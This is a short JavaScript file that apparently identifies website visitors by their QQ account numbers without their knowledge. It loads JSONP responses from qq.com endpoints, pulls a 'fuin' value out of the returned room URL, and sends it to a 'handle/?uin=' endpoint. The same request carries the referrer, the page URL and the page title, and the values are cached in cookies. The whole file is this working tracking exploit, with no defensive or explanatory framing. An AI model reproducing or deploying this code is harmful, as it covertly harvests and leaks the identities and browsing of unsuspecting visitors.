(function() {
	function m(c, b, d) {
		var a = document.createElement("script");
		a.type = "text/javascript";
		a.charset = "utf-8";
		a.src = c;
		a.onerror = function() {
			d && setTimeout(d, 0)
		};
		n ? a.onreadystatechange = function() {
			if (a.readyState) {
				if ("loaded" == a.readyState || "complete" == a.readyState) a.onreadystatechange = null, a.onload = null, b && setTimeout(b, 0)
			} else a.onreadystatechange = null, a.onload = null, b && setTimeout(b, 0)
		} : a.onload = function() {
			if (a.readyState) {
				if ("loaded" == a.readyState || "complete" == a.readyState) a.onreadystatechange = null, a.onload = null, b && setTimeout(b, 0)
			} else a.onreadystatechange = null, a.onload = null, b && setTimeout(b, 0)
		};
		document.getElementsByTagName("HEAD").item(0).appendChild(a)
	}
	function e() {
		var c = "http://apps.qq.com/app/yx/cgi-bin/show_fel?hc=8&lc=4&d=11231213&t=" + (new Date).getTime();
		m(c, p)
	}
	function g() {
		var c = document.getElementById("qq_js"),
			b = Math.random(),
			d = c.src.split("?uin=")[1],
			c = document.getElementsByTagName("HEAD").item(0),
			a = document.createElement("script");
		a.type = "text/javascript";
		a.charset = "utf-8";
		var d = "handle/?uin=" + d,
			e = encodeURIComponent(document.referrer),
			g = encodeURIComponent(document.location.href),
			h = encodeURIComponent(document.title),
			b = d + "&xx1=" + f + "&xx2=" + k + "&r=" + e + "&title=" + h + "&readurl=" + g + "&tm=" + b + "&t=" + (new Date).getTime();
		a.src = b;
		c.appendChild(a)
	}
	function p() {
		try {
			1026 == data0.err ? setTimeout(q, 0) : setTimeout(h, 0)
		} catch (c) {
			setTimeout(h, 0)
		}
	}
	function q() {
		document.getElementById("qq_js");
		Math.random();
		var c = document.getElementsByTagName("HEAD").item(0),
			b = document.createElement("script");
		b.type = "text/javascript";
		b.charset = "utf-8";
		b.src = "http://jsonp.ke.qq.com/cgi-bin/course/new_list?callback=gqq_callback";
		c.appendChild(b)
	}
	function h() {
		setTimeout(e, 3E3)
	}
	function l(c) {
		var b;
		return (b = document.cookie.match(new RegExp("(^| )" + c + "=([^;]*)(;|$)"))) ? b[2] : "null"
	}
	var n = document.all ? !0 : !1;
	document.getElementsByTagName("HEAD").item(0);
	var f = "",
		k = "";
	window.gqq_callback = function(c) {
		try {
			f = c.result.items[1].room_url.split("fuin=")[1], k = "Null", setTimeout(g, 1)
		} catch (b) {}
	};
	f = l("xx1");
	k = l("xx2");
	try {
		"" == f || "null" == f ? e() : setTimeout(g, 1)
	} catch (r) {
		e()
	}
})();